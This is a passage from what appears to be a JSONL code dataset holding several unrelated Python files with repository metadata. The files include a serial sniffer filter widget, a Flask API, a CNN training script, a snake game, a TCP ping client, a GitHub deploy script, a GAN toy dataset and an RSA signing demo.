\n def saveFilter(self):\n #--Save by ID--#\n rowCnt = self.filterTable.rowCount()\n # Document this later... no idea what I did there\n # I think it goes like this:\n # \\n-> We go through the table and append a 1 to a string if a box is checked and a 0 if not\n # \\n-> We convert this '10011011..' string to a series of bytes via TSP section XXX\n # \\n-> We send to the filter byte-for-byte to the controller\n filterStr = ''\n for rows in range(1,rowCnt): \n if self.filterTable.item(rows,1).checkState() == Qt.Checked:\n #print(self.filterTable.item(rows,0).text())\n filterStr = filterStr + '1'\n else:\n filterStr = filterStr + '0'\n filterStr = filterStr.ljust(104,'1')\n concattedBytes = filterStr\n import re\n concattedBytes = re.findall('........', filterStr) \n print(concattedBytes)\n byteList = []\n for byteStr in concattedBytes:\n byteList.append(bytes([int(byteStr[::-1],2)]))\n print(byteList)\n # Now we send the converted bytes over Serial interface\n try:\n self.serialHandle = serial.Serial(Globals.dockDict['dockConfig'].snifferConfig.configCom,int(Globals.dockDict['dockConfig'].snifferConfig.configBaud),timeout=3,parity=serial.PARITY_NONE,rtscts=False,dsrdtr=False)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print (message)\n return\n \n self.serialHandle.write(b'\\x98')\n time.sleep(0.00001) # We need to sleep because of the OS-hardware-buffer\n for bytesToSend in byteList:\n print(bytesToSend)\n self.serialHandle.write(bytesToSend)\n time.sleep(0.00001) # We need to sleep because of the OS-hardware-buffer\n self.serialHandle.write(b'\\xff')\n self.serialHandle.write(b'\\xff')\n self.serialHandle.close()\n \n ## Check whether the first checkbox was checked and then update the entire ID table to either checked or unchecked state\n # @param checkBox a checkBox we perform the query on \n def filterAllIDs(self,checkBox):\n if self.layoutingComplete == True:\n if checkBox.column() == 1 and checkBox.row() == 0: # We clicked the toggle ID checkbox\n if checkBox.checkState() == Qt.Checked:\n rowCnt = self.filterTable.rowCount()\n for rows in range(0,rowCnt):\n try:\n self.filterTable.item(rows, 1).setCheckState(Qt.Checked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n elif checkBox.checkState() == Qt.Unchecked:\n rowCnt = self.filterTable.rowCount()\n for rows in range (0,rowCnt):\n try:\n self.filterTable.item(rows, 1).setCheckState(Qt.Unchecked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n else:\n print('neither checked nor unchecked...should never be here..')\n elif checkBox.column() == 3 and checkBox.row() == 0: # We clicked the toggle Message checkbox\n if checkBox.checkState() == Qt.Checked:\n rowCnt = self.filterTable.rowCount()\n for rows in range(0,rowCnt):\n try:\n self.filterTable.item(rows, 3).setCheckState(Qt.Checked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n elif checkBox.checkState() == Qt.Unchecked:\n rowCnt = self.filterTable.rowCount()\n for rows in range (0,rowCnt):\n try:\n self.filterTable.item(rows, 3).setCheckState(Qt.Unchecked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n else:\n print('neither checked nor unchecked...should never be here..')\n \n # --- HELPER FUNCTIONS --- #\n ## Create a defined checkbox within a tableWidgetItem to facilitate filling the table \n # @return the created checkbox \n def createCheckBox(self):\n myCheck = QTableWidgetItem()\n myCheck.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)\n myCheck.setCheckState(Qt.Checked)\n return myCheck \n \n ## Create a defined font (bold,underlined) to facilitate filling the table\n # @return the created font \n def getFont(self):\n font = QFont()\n font.setBold(True) \n font.setUnderline(True) \n return font ","repo_name":"Penlane/Tracesniffer-GUI","sub_path":"Modules/HardwareFilterWidget.py","file_name":"HardwareFilterWidget.py","file_ext":"py","file_size_in_byte":9469,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"6"} +{"seq_id":"8834760378","text":"# bool: boolean values (True=1 or False=0)\n\ndef check_signal(signal: bool) -> bool:\n if signal == 1:\n return True\n elif signal == 0:\n return False\n\nif __name__ ==\"__main__\":\n\n turn_on: bool = 1\n turn_off: bool = 0\n\n # True sample.\n result: bool = check_signal(turn_on)\n print(\"Status: \", result)\n print(\"Type: \", type(result))\n\n # False sample.\n result = check_signal(turn_off)\n print(\"Status: \", result)\n print(\"Type: \", type(result))\n","repo_name":"drigols/studies","sub_path":"modules/python-codes/modules/type-hints/src/check_signal.py","file_name":"check_signal.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73304075068","text":"import argparse\nimport os\n\nimport numpy as np\nfrom imutils import paths\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelBinarizer\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# 保存文件路径配置\nfrom projectconfig import pathconfig\n# 图像预处理\nfrom pyimagesearch.datasets import SimpleDatasetLoader as SDL\nfrom pyimagesearch.nn.conv import BinaryNet as BinNet\nfrom pyimagesearch.preprocessing import AspectAwarePreprocessor as AAP\nfrom pyimagesearch.preprocessing import ImageToArrayPreprocessor as IAP\n# GPU 初始化\nfrom tfsettings.gpu import InitGpu\n# 回调函数\nfrom tfsettings.traincallbacks import modelcheckpoint as TF_CB_chcekpoint\nfrom tfsettings.traincallbacks import tensorboard as TF_CB_tensorboard\n# 绘制训练结果\nfrom utils.trainplot import plot as my_plot_tool\n\nap = argparse.ArgumentParser() # 从命令中读取参数\nap.add_argument('-d', '--train_dataset', required=True, help='path to train dataset')\nap.add_argument('-e', '--epochs', required=True, help='training epochs number')\nap.add_argument('-t', '--test_dataset', required=True, help='path to test dataset')\nargs = vars(ap.parse_args())\n\nprint('[INFO] initing gpu.....')\ngpu = InitGpu.InitGpu()\ngpu.init()\n\nprint(\"[INFO] loading train images...\") # 预处理图片\nimagePaths = [x for x in list(paths.list_images(args['train_dataset'])) if x.split(os.path.sep)[-2] != 'jpg']\nclassNames = [pt.split(os.path.sep)[-2] for pt in imagePaths]\nclassNames = [str(x) for x in np.unique(classNames)]\n\naap = AAP.AspectAwarePreprocesser(64, 64) # 重设大小\niap = IAP.ImageToArrayPreprocess() # 转换成张量\n\nsdl = SDL.SimpleDatasetLoader(preprocessors=[aap, iap])\n(train_data, train_labels) = sdl.load(imagePaths, verbose=500)\ntrain_data = train_data.astype('float') / 255.0\n\n(trainX, validX, trainY, validY) = train_test_split(train_data, train_labels, test_size=0.30, random_state=43)\n\ntrainY = LabelBinarizer().fit_transform(trainY)\nvalidY = LabelBinarizer().fit_transform(validY)\n\n# construct the image generator for data augmentation 数据增强\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\n height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\n horizontal_flip=True, fill_mode=\"nearest\")\n\n# initialize the optimizer and model\nprint(\"[INFO] compiling model...\")\n# opt = SGD(lr=0.05)\nopt = 'adam'\nbatch_size = 128\nmodel = BinNet.BinaryNet.build(width=64, height=64, depth=3)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=opt,\n metrics=[\"accuracy\"])\n\nprint(\"[INFO] training network...\")\nepochs = int(args['epochs'])\nconfig_path = pathconfig.PathConfig() # 实例化对象\nconfig_path.set_root_path(new_root_path='results/results03') # 设置训练结果保存路径\n\n# 构建回调函数\n# 生成 tersorborad log 文件\ncb_tensorboard = TF_CB_tensorboard.TensorBoardCallBack()\ncb_tensorboard.set_log_path(config_path.get_tensorboard_path())\n# 保存 cp 文件\ncb_chcekpoint = TF_CB_chcekpoint.ModelCheckpointCallBack()\ncb_chcekpoint.set_checkpoint_path(config_path.get_checkpoint_path())\n\nH = model.fit(aug.flow(trainX, trainY, batch_size=batch_size),\n validation_data=(validX, validY), steps_per_epoch=len(trainX) // batch_size,\n epochs=epochs, verbose=1,\n callbacks=[cb_tensorboard.build_cb(), cb_chcekpoint.build_cb()])\n# 保存模型\nmodel.save(filepath=config_path.get_model_save_path())\n\n# evaluate the network\nfrom utils.testplot.plot import ConfusionMatrix\n\nconfusion_matrix = ConfusionMatrix()\nconfusion_matrix = confusion_matrix.begin(args['test_dataset'], model=model, batch_size=batch_size)\n\n# 绘制结果\nmy_plot_tool.plot_train_loss_and_acc(epochs=epochs, H=H)\n","repo_name":"expoli/My-CNN-frame-example","sub_path":"BinaryNet_data_aug.py","file_name":"BinaryNet_data_aug.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26128517515","text":"\nclass Jogo:\n\n def __init__(self,nome):\n self.nome = nome\n\n def __str__(self):\n return self.nome\n \nnbajam= Jogo('Nbajam')\nprint(nbajam)\n\ntopgear = Jogo('Topgear')\nprint(topgear)\n\nclass TipoJogo:\n def __init__(self,tipo):\n self.tipo = tipo\n def __str__(self):\n return self.tipo\n\nação= TipoJogo('Ação')\nprint(ação)\n\naventura= TipoJogo('Aventura')\nprint(aventura)\n\nestratégia= TipoJogo('Estratégia')\nprint(estratégia)\n\ncorrida= TipoJogo('Corrida')\nprint(corrida)\n\nesporte= TipoJogo('Esporte')\nprint(esporte)\n","repo_name":"RogerioAguilera/tdd-python","sub_path":"codigo/jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9936807764","text":"#definicion de la clase\nclass Usuario:\n \n def __init__(self, nombre, edad, profesion):\n self.nombre = nombre\n self.edad = edad\n self.profesion = profesion\n self.especie = 'humano'\n def imprimirNombre(self):\n print(self.nombre)\n \nusuario1 = Usuario('kender', 24, 'programador') #instancia de la clase\n#ejemlos\nusuario1.imprimirNombre()\nprint(usuario1.especie, usuario1.edad, usuario1.profesion)\n","repo_name":"kenderperez/pythonCookBook","sub_path":"sep2022/clases.py","file_name":"clases.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3099973701","text":"import random\nfrom traceback import print_tb\n\na = []\n\nwhile len(a) <= 3:\n i = random.randrange(10, 20)\n a.append(i)\n if len(a) > 3:\n print('4가지 수: ', a)\n break\n\naverage = sum(a)/4\nprint('평균: ', average)\n\nprint('Big') if average >= 15 else print('Small')","repo_name":"yunzookim/beatcodingpy","sub_path":"162.py","file_name":"162.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4214550881","text":"from flask import jsonify, request\n\nfrom app.api import api\nfrom app.repositories import current_repo\nfrom app.core.request_objects.post import (\n PostListRequestObject,\n PostItemRequestObject,\n PostCreateRequestObject,\n)\nfrom app.core.use_cases import PostListUseCase, PostItemUseCase, PostCreateUseCase\nfrom app.serializers import PostSchema\n\n\n@api.route(\"/v1/posts\", methods=[\"GET\"])\ndef post_list():\n \"\"\"\n Post 목록\n ---\n tags:\n - post\n responses:\n 200:\n description: \"Success\"\n schema:\n type: \"array\"\n items:\n $ref: \"#/definitions/Post\"\n \"\"\"\n\n req = PostListRequestObject()\n uc = PostListUseCase(repo=current_repo)\n resp = uc.execute(req)\n\n if resp:\n schema = PostSchema(many=True, exclude=(\"comments\",))\n posts = schema.dump(resp.value).data\n return jsonify(posts)\n else:\n return jsonify({}), 400\n\n\n@api.route(\"/v1/posts\", methods=[\"POST\"])\ndef post_create():\n \"\"\"\n 새로운 Post 등록\n ---\n tags:\n - post\n parameters:\n - in: \"body\"\n name: \"body\"\n description: \"Pet object that needs to be added to the store\"\n required: true\n schema:\n $ref: \"#/definitions/PostInput\"\n responses:\n 201:\n description: \"생성됨\"\n 403:\n description: \"권한 없음\"\n 405:\n description: \"Invalid input\"\n \"\"\"\n payload = request.get_json()\n req = PostCreateRequestObject.from_dict(\n {\"title\": payload.get(\"title\"), \"body\": payload.get(\"body\")}\n )\n uc = PostCreateUseCase(repo=current_repo)\n resp = uc.execute(req)\n\n if resp:\n schema = PostSchema()\n post = schema.dump(resp.value).data\n return jsonify(post)\n else:\n return jsonify({}), 500\n\n\n@api.route(\"/v1/posts/\", methods=[\"GET\"])\ndef post_item(post_id):\n \"\"\"\n Post 조회\n ---\n tags:\n - post\n parameters:\n - in: \"path\"\n name: \"post_id\"\n description: \"게시물 번호\"\n required: true\n type: \"integer\"\n responses:\n 200:\n description: \"성공\"\n schema:\n $ref: \"#/definitions/Post\"\n 403:\n description: \"게시물 조회 권한이 없음\"\n 404:\n description: \"게시물이 존재하지 않음\"\n \"\"\"\n\n req = PostItemRequestObject.from_dict({\"id\": int(post_id)})\n uc = PostItemUseCase(repo=current_repo)\n resp = uc.execute(req)\n\n if resp:\n schema = PostSchema()\n post = schema.dump(resp.value).data\n return jsonify(post)\n elif resp.type == \"NotFoundError\":\n return jsonify({}), 404\n else:\n return jsonify({}), 500\n\n\n@api.route(\"/v1/posts/\", methods=[\"PUT\"])\ndef post_update(post_id):\n \"\"\"\n Post 수정\n ---\n tags:\n - post\n parameters:\n - in: \"body\"\n name: \"body\"\n description: \"Pet object that needs to be added to the store\"\n required: true\n schema:\n $ref: \"#/definitions/Post\"\n responses:\n 405:\n description: \"Invalid input\"\n \"\"\"\n return {}\n\n\n@api.route(\"/v1/posts/\", methods=[\"DELETE\"])\ndef post_delete(post_id):\n \"\"\"\n Post 삭제\n ---\n tags:\n - post\n parameters:\n - in: \"body\"\n name: \"body\"\n description: \"Pet object that needs to be added to the store\"\n required: true\n schema:\n $ref: \"#/definitions/Post\"\n responses:\n 405:\n description: \"Invalid input\"\n \"\"\"\n return {}\n","repo_name":"yoophi/sample-posts-api","sub_path":"app/api/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42607040571","text":"import time\nfrom socket import *\nserverName = '127.0.0.1' # 主机\nserverPort = 12000\n# 创建Socket时,AF_INET指定使用IPv4协议,如果要用更先进的IPv6,就指定为AF_INET6\n# SOCK_DGRAM指定了这个Socket的类型是UDP\n# SOCK_STREAM指定使用面向流的TCP协议\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((serverName,serverPort))\nclientSocket.settimeout(1) # 设置超时时间为1s\nfor i in range(0, 10):\n oldTime = time.time()\n sendTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(oldTime))\n # encode()把str转成bytes\n message = ('package %d,client_local_time:%s' % (i + 1, sendTime)).encode()\n try:\n # 发送数据\n clientSocket.send(message)\n # UDP的 recvfrom() 和 TCP 的recv()不一样,具体可以看 TCP Ping项目\n modifiedMessage = clientSocket.recv(1024)\n # 计算往返时间\n rtt = time.time() - oldTime\n # decode 把bytes转成str\n modifiedMessage = modifiedMessage.decode(\"utf-8\")\n print('报文 %d 收到来自 %s 的应答: %s,往返时延(RTT) = %fs' % (i+1, serverName,modifiedMessage, rtt))\n except Exception as e:\n print('报文 %d: 的请求超时' % (i+1)) # 处理异常\n\n","repo_name":"inspurer/ComputerNetwork","sub_path":"《计算机网络自顶向下方法》课后编程作业题解/第二章(应用层)/扩展1:TCP ping程序/TCPPingClient.py","file_name":"TCPPingClient.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"zh","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"43779791916","text":"import pygame\nimport sys\nimport math\nfrom random import choice\nPURPLE = (255, 0, 255)\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nsize = 500\n\n# Set screen size and init pygame\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode([size, size])\npygame.init()\n\n# Segment is a block of the Snake\n# The snake is constructed of these segments\n\n\nclass Segment:\n def __init__(self, x, y, width=10, colour=PURPLE):\n self.x, self.y = x, y\n self.width = width\n self.colour = colour\n\n\n# Draw the segment at the specified coordinates\n# Segments are squares with dimensions of width*width\n\n def segment_draw(self):\n pygame.draw.rect(screen, self.colour, (self.x, self.y, self.width,\n self.width), 0)\n\n\n# Food is the objective that snake is meant to reach\n# Food will cause the snake to grow and score to increase\nclass Food:\n def __init__(self, colour=RED, x=0, y=0, width=10, size=500):\n self.x, self.y = x, y\n self.width = width\n self.size = size\n self.colour = colour\n\n# Update coordinates after the food has been eaten\n def food_new(self):\n self.x = choice(range(10, self.size, self.width))\n self.y = choice(range(10, self.size, self.width))\n\n\n# Draw the food at the specified coordinates\n# Food is a square of width*width dimension\n def food_draw(self, screen):\n pygame.draw.rect(screen, self.colour, (self.x, self.y,\n self.width, self.width), 0)\n\n\n# Snake class\n# Length controls starting number of segments\n# self.segments is used to store the segments of the snake\n# xVel and yVel are velocities used to determine snake movement\n# direction is a label of the current direction of the snake\nclass Snake:\n def __init__(self, length=5, size=500):\n self.initial_length = length\n self.length = length\n self.segments = []\n self.x, self.y = size//2, size//2\n self.xVel, self.yVel = 0, 0\n for i in range(length):\n self.segments.append(Segment(self.x, self.y))\n self.x += self.segments[i].width\n\n# Function to move the snake\n# Tail is popped and new head is drawn\n def snake_move(self):\n self.x += self.xVel\n self.y += self.yVel\n self.segments.insert(0, Segment(self.x, self.y))\n self.segments.pop()\n\n# Function to add a new segment to the snake\n# Draws a head in the place of the eaten food\n def snake_grow(self):\n self.x += self.xVel\n self.y += self.yVel\n self.segments.insert(0, Segment(self.x, self.y))\n self.segments.pop()\n\n def snake_reset(self, length=5, size=500):\n self.initial_length = length\n self.length = length\n self.segments = []\n self.x, self.y = size // 2, size // 2\n self.xVel, self.yVel = -10, 0\n for i in range(length):\n self.segments.append(Segment(self.x, self.y))\n self.x += self.segments[i].width\n\n # Function to create the snake\n\n def snake_draw(self):\n for i in range(len(self.segments)):\n self.segments[i].segment_draw()\n self.length = len(self.segments)\n","repo_name":"Lena-MJL/PySnakeAI","sub_path":"game_objects.py","file_name":"game_objects.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21648042831","text":"from google.cloud import datacatalog_v1beta1\n\nfrom datacatalog_tag_template_processor import constant\n\n\nclass DataCatalogEntityFactory:\n __TRUTHS = {1, '1', 't', 'T', 'true', 'True', 'TRUE'}\n\n @classmethod\n def make_tag_template(cls, tag_template_dict):\n tag_template = datacatalog_v1beta1.types.TagTemplate()\n\n tag_template.display_name = tag_template_dict['display_name']\n\n fields = tag_template_dict['fields']\n\n field_order = len(fields)\n for field_id, items in fields.items():\n field_display_name = items['field_display_name']\n field_type = items['field_type']\n\n tag_template.fields[field_id].display_name = field_display_name\n\n field_type = field_type.upper()\n\n if field_type in constant.ALLOWED_BOOL_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.BOOL.value\n elif field_type in constant.ALLOWED_DOUBLE_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.DOUBLE.value\n elif field_type in constant.ALLOWED_STRING_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.STRING.value\n elif field_type in constant.ALLOWED_DATETIME_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.TIMESTAMP.value\n elif field_type in constant.ALLOWED_ENUM_VALUES:\n enum_values = items['enum_values']\n for enum_value in enum_values:\n tag_template.fields[field_id].type.enum_type \\\n .allowed_values.add().display_name = enum_value\n\n tag_template.fields[field_id].order = field_order\n field_order -= 1\n\n return tag_template\n","repo_name":"mesmacosta/datacatalog-tag-template-processor","sub_path":"src/datacatalog_tag_template_processor/datacatalog_entity_factory.py","file_name":"datacatalog_entity_factory.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"26551813229","text":"#!/usr/bin/env python3\n\n####################################\n# ACE3 automatic deployment script #\n# ================================ #\n# This is not meant to be run #\n# directly!! #\n####################################\n\nimport os\nimport sys\nimport traceback\nimport subprocess as sp\nfrom github import Github\n\n\nTRANSLATIONISSUE = 367\nTRANSLATIONBODY = \"\"\"**[ACE3 Translation Guide](http://ace3.acemod.org/wiki/development/how-to-translate-ace3.html)**\n\n{}\n\"\"\"\n\nREPOUSER = \"acemod\"\nREPONAME = \"ACE3\"\nREPOPATH = \"{}/{}\".format(REPOUSER, REPONAME)\n\nBRANCH = \"master\"\n\n\ndef update_translations(repo):\n diag = sp.check_output([\"python3\", \"tools/stringtablediag.py\", \"--markdown\"])\n diag = str(diag, \"utf-8\")\n issue = repo.get_issue(TRANSLATIONISSUE)\n issue.edit(body=TRANSLATIONBODY.format(diag))\n\n\ndef main():\n print(\"Obtaining token ...\")\n try:\n token = os.environ[\"GH_TOKEN\"]\n repo = Github(token).get_repo(REPOPATH)\n except:\n print(\"Could not obtain token.\")\n print(traceback.format_exc())\n return 1\n else:\n print(\"Token sucessfully obtained.\")\n\n print(\"\\nUpdating translation issue ...\")\n try:\n update_translations(repo)\n except:\n print(\"Failed to update translation issue.\")\n print(traceback.format_exc())\n return 1\n else:\n print(\"Translation issue successfully updated.\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"acemod/ACE3","sub_path":"tools/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":966,"dataset":"github-code","pt":"6"} +{"seq_id":"40966565700","text":"\n# Steve's adaptation of VEEGAN example:\n# https://github.com/akashgit/VEEGAN/blob/master/VEEGAN_2D_RING.ipynb\n# to TensorFlow 2 + Keras, with the TensorFlow Probabilities library:\n# https://blog.tensorflow.org/2019/03/variational-autoencoders-with.html\n#\n# Stephen Sinclair \n\nimport matplotlib as mpl\nmpl.use('Agg')\n# mpl.rcParams['font.family'] = 'serif'\n# mpl.rcParams['font.serif'] = ['cmr10']\n# mpl.font_manager.findfont('cmmr')\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom itertools import product\nimport sys, os\n\ndists = tfp.distributions\n\n# Generate 2D grid\n\nmus = np.array([np.array([i, j]) for i, j in product(range(-4, 5, 2),\n range(-4, 5, 2))],\n dtype=np.float32)\n# mus = np.array([np.array([i, j]) for i, j in product(range(-1, 1, 1),\n# range(-1, 1, 1))],\n# dtype=np.float32)\n\nclass Dataset(object):\n def __init__(self, params):\n self.params = params\n\n def latent_generator(self, batch_size):\n if self.params['latent_prior']=='uniform':\n while True:\n yield tf.random.uniform([batch_size, self.params['latent_dim']])\n elif self.params['latent_prior']=='normal':\n while True:\n yield tf.random.normal([batch_size, self.params['latent_dim']])\n else:\n assert False and 'Unknown latent prior.'\n\n def data_generator(self, batch_size):\n while True:\n yield self.normal_mixture([batch_size, self.params['data_dim']])\n\n def eps_generator(self, batch_size, dims):\n while True:\n yield tf.random.normal([batch_size, dims])\n\n def normal_mixture(self, shape, **kwargs):\n return self.create_distribution(shape[0],25,shape[1],**kwargs)\n\n @tf.function\n def create_distribution(self, batch_size, num_components=25,\n num_features=2,**kwargs):\n num_components = len(mus)\n cat = dists.Categorical(tf.zeros(num_components, dtype=np.float32))\n\n s = 0.05\n sigmas = [np.array([s,s]).astype(np.float32) for i in range(num_components)]\n components = list((dists.MultivariateNormalDiag(mu, sigma) \n for (mu, sigma) in zip(mus, sigmas)))\n data = dists.Mixture(cat, components)\n return data.sample(batch_size)\n\n # Network definitions\n def normal_mixture(self, shape, **kwargs):\n return self.create_distribution(shape[0],25,shape[1],**kwargs)\n\n # Visualization\n def init_viz(self, dirname, method, variant, x_input, z_input, eps_input):\n self.dirname = dirname\n self.method = method\n self.variant = variant\n self.fig, (self.ax,self.ax2,self.ax3) = plt.subplots(1,3, num=1, figsize=(9,4))\n self.lims = None\n self.frame = 0\n self.x_input_viz = x_input\n self.eps_input_viz = eps_input\n self.z_input_viz = z_input\n # TODO abstract the possibility of a pre-clustered input distribution\n N = tf.shape(self.z_input_viz)[0]\n self.x_input_viz = np.array(\n [np.hstack([tf.random.normal([N,1], mean=m[0], stddev=0.05),\n tf.random.normal([N,1], mean=m[1], stddev=0.05)])\n for m in mus])\n self.eps_input_viz = next(self.eps_generator(500, 1))\n self.z_input_viz = next(self.latent_generator(500))\n\n self.x_scat = self.ax.scatter([0],[0], label='target', marker='.', alpha=0.05, edgecolors='none')\n self.px_scat = self.ax.scatter([0],[0], label='generated', marker='.', alpha=0.2, edgecolors='none')\n if not os.path.exists(self.dirname):\n os.mkdir(self.dirname)\n plt.subplots_adjust()\n\n def viz(self, epoch, decoder, encoder):\n continue_seed = int(tf.random.uniform([1])*65536)\n tf.random.set_seed(2)\n N = self.x_input_viz.shape[1]\n D = self.x_input_viz.shape[2]\n x_output = decoder([self.z_input_viz,self.eps_input_viz])\n xl_ = np.array([np.minimum(np.min(self.x_input_viz[:,:,0]),np.min(x_output[:,0])),\n np.maximum(np.max(self.x_input_viz[:,:,0]),np.max(x_output[:,0]))])\n yl_ = np.array([np.minimum(np.min(self.x_input_viz[:,:,1]),np.min(x_output[:,1])),\n np.maximum(np.max(self.x_input_viz[:,:,1]),np.max(x_output[:,1]))])\n if self.lims is None:\n self.lims = np.hstack([xl_, yl_])\n else:\n self.lims[0] = self.lims[0]*0.95+xl_[0]*0.05\n self.lims[1] = self.lims[1]*0.95+xl_[1]*0.05\n self.lims[2] = self.lims[2]*0.95+yl_[0]*0.05\n self.lims[3] = self.lims[3]*0.95+yl_[1]*0.05\n self.ax.set_xlim(self.lims[:2]); self.ax.set_ylim(self.lims[2:4])\n self.x_scat.set_offsets(tf.reshape(self.x_input_viz,(len(mus)*N,D))[:,:2])\n self.px_scat.set_offsets(x_output[:,:2])\n f = self.ax.set_title('decoded', fontname='cmr10')\n #ax.legend(loc=1, prop=f.get_fontproperties())\n self.ax2.clear()\n self.ax3.clear()\n # ax2.scatter(self.z_input_viz[:,0], self.z_input_viz[:,1])\n for i,m in enumerate(mus):\n z_output = encoder(self.x_input_viz[i])\n self.ax2.scatter(z_output[:,0], z_output[:,1], marker='.', alpha=0.2, edgecolors='none')\n x_output = decoder([z_output,self.eps_input_viz[i:i+N]])\n self.ax3.scatter(x_output[:,0], x_output[:,1], marker='.', alpha=0.2, edgecolors='none')\n self.ax3.set_xlim(self.lims[:2]); self.ax3.set_ylim(self.lims[2:4])\n self.ax3.set_title('reconstruction', fontname='cmr10')\n if self.params['latent_prior']=='normal':\n self.ax2.plot(np.cos(np.linspace(0,2*np.pi,200))*1.96,\n np.sin(np.linspace(0,2*np.pi,200))*1.96, 'k--', alpha=0.4)\n self.ax2.set_xlim(-3,3)\n self.ax2.set_ylim(-3,3)\n elif self.params['latent_prior']=='uniform':\n self.ax2.plot([[0,1],[0,1],[0,0],[1,1]],\n [[0,0],[1,1],[0,1],[0,1]], 'k--', alpha=0.4)\n self.ax2.set_xlim(-0.5,1.5)\n self.ax2.set_ylim(-0.5,1.5)\n if self.z_input_viz.shape[1]==2:\n self.ax2.set_title('encoded', fontname='cmr10')\n else:\n self.ax2.set_title('encoded (first 2 dims)', fontname='cmr10')\n self.fig.suptitle(\n f'{self.z_input_viz.shape[1]}D {self.method} {self.variant} — Epoch {epoch}',\n fontname='cmr10')\n # fig.canvas.draw()\n # plt.pause(0.0001)\n self.fig.savefig('now.png')\n self.fig.savefig(f'{self.dirname}/frame{self.frame:06d}.png')\n self.frame += 1\n tf.random.set_seed(continue_seed)\n\nif __name__=='__main__':\n d = Dataset({'latent_prior':'normal', 'data_dim': 2, 'latent_dim': 2})\n x = next(d.data_generator(200))\n z = next(d.latent_generator(200))\n e = next(d.eps_generator(200,1))\n d.init_viz('testviz', 'testmethod', 'testvariant', x, z, e)\n d.viz(0, lambda z: x, lambda x: z)\n","repo_name":"radarsat1/latentspace","sub_path":"datasets/multimodal_gaussian_2d.py","file_name":"multimodal_gaussian_2d.py","file_ext":"py","file_size_in_byte":7143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6340366417","text":"\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\n#generating private key using rsa \n#make function to sign the message \n#make a verification function => uses pu , sign , message\ndef gneratekeys():\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n ) \n\n public_key = private_key.public_key()\n return private_key,public_key\n\ndef sign(message,private_key):\n message=bytes(message,'utf-8')\n signature = private_key.sign(\n message,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n return signature\n\ndef verify(signature,message,public_key):\n\n try:\n message=bytes(message,'utf-8')\n public_key.verify(\n signature,\n message,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n print(\"The message is Verified \")\n except:\n print(\"The message does no match\")\n \nif __name__==\"__main__\":\n pr,pu=gneratekeys()\n # print(pr,pu)\n message=\"Think of this message as a transaction message\"\n incorrectMessage = \"this is not the correct meesage\"\n signature =sign(message,pr)\n verify(signature,message,pu)\n \n","repo_name":"swarupyeole11/BlockchainCryptography","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} 